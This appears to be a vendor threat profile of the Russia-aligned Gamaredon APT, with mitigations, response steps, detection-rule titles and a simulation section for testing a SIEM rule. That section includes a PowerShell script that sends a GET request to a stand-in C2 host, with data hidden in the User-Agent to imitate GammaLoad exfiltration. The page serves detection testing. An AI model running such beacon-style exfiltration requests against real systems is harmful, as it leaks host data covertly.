Gamaredon (Primitive Bear) APT Profile with MITRE ATT&CK Mapping
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
Gamaredon is a Russia-aligned advanced persistent threat group active since 2013 and attributed to the Russian FSB. The group is focused on cyber espionage and data theft, with primary targeting aimed at Ukrainian government and defense organizations. Its operations rely on custom malware families such as GammaLoad and GammaSteel, supported by a range of obfuscation and persistence methods.
Investigation
The report reviews campaigns spanning from 2013 through 2025 and highlights the group’s shift toward using Cloudflare Workers, Telegram APIs, and exploitation of WinRAR vulnerabilities. It also traces Gamaredon’s progression from custom VBScript droppers to more advanced PowerShell-based infostealers and mobile spyware.
Mitigation
Recommended mitigations include patching WinRAR to address CVE-2025-8088 and monitoring for suspicious PowerShell execution. Organizations should also enforce strict controls on removable media, watch for unusual scheduled tasks, and validate defensive controls against Gamaredon’s known TTPs through simulation and testing platforms.
Response
If Gamaredon activity is detected, responders should isolate affected hosts immediately, especially systems showing signs of GammaSteel or Ptero* malware activity. Investigators should review registry-based persistence, inspect scheduled tasks for unauthorized entries, and conduct a broad hunt for suspicious outbound traffic to Cloudflare or Telegram-linked infrastructure.
Attack Flow
Detections
Call Suspicious .NET Methods from Powershell (via powershell)
View
Possible Persistence Points [ASEPs – Software/NTUSER Hive] (via registry_event)
View
Possible Data Exfiltration over Rclone Tool (via cmdline)
View
Download or Upload via Powershell (via cmdline)
View
Call Suspicious .NET Classes/Methods from Powershell CommandLine (via process_creation)
View
Schtasks Points to Suspicious Directory / Binary / Script (via cmdline)
View
LOLBAS WScript / CScript (via process_creation)
View
Suspicious LOLBAS MSHTA Defense Evasion Behavior by Detection of Associated Commands (via process_creation)
View
Suspicious Binary / Scripts in Autostart Location (via file_event)
View
Possible CVE-2025-8088 / CVE-2025-6218 (WinRAR Vulnerability) Exploitation Attempt (via file_event)
View
Possible Dynamic DNS Service Was Contacted (via dns)
View
Detection of Gamaredon GammaLoad GET Requests with User-Agent Exfiltration [Windows Network Connection]
View
PowerShell Downloader via LNK Shortcut with Obfuscation [Windows Powershell]
View
## Simulation Execution
Prerequisite: The Telemetry & Baseline Pre-flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.
-
Attack Narrative & Commands: An adversary has established a foothold on
WORKSTATION01. To exfiltrate system metadata (such as hostnames or usernames) without triggering traditional file-based DLP, they use a custom implementation of the GammaLoad malware. This malware performs HTTP GET requests to a remote Command & Control (C2) server. Instead of placing data in the URI or POST body, the malware embeds the encoded workstation identity within theUser-Agentheader:::WORKSTATION01_encoded_data. This allows the data to bypass simple URL filtering while remaining hidden in standard web traffic. -
Regression Test Script: This script uses PowerShell to simulate the specific HTTP GET request with the malicious User-Agent string required to trigger the rule.
# Simulation of GammaLoad User-Agent Exfiltration $TargetUrl = "http://example-c2-server.com/api/check" $MaliciousUA = "::WORKSTATION01_V3_DATA_EXFIL_TEST" Write-Host "[*] Starting simulation: Sending GET request with malicious User-Agent..." -ForegroundColor Cyan try { $response = Invoke-WebRequest -Uri $TargetUrl -UserAgent $MaliciousUA -Method GET Write-Host "[+] Request sent successfully. Check SIEM for alert." -ForegroundColor Green } catch { # We expect a connection error if the URL doesn't exist, # but the User-Agent will still be logged by the proxy. Write-Host "[!] Request attempted (Note: Connection error is expected if URL is invalid, but proxy logs should still capture the UA)." -ForegroundColor Yellow } -
Cleanup Commands: Since this simulation only generates transient network traffic and does not modify system files or registry keys, no cleanup is required.
# No system changes were made. Simulation complete. Write-Host "[*] Cleanup: No traces left on host." -ForegroundColor Green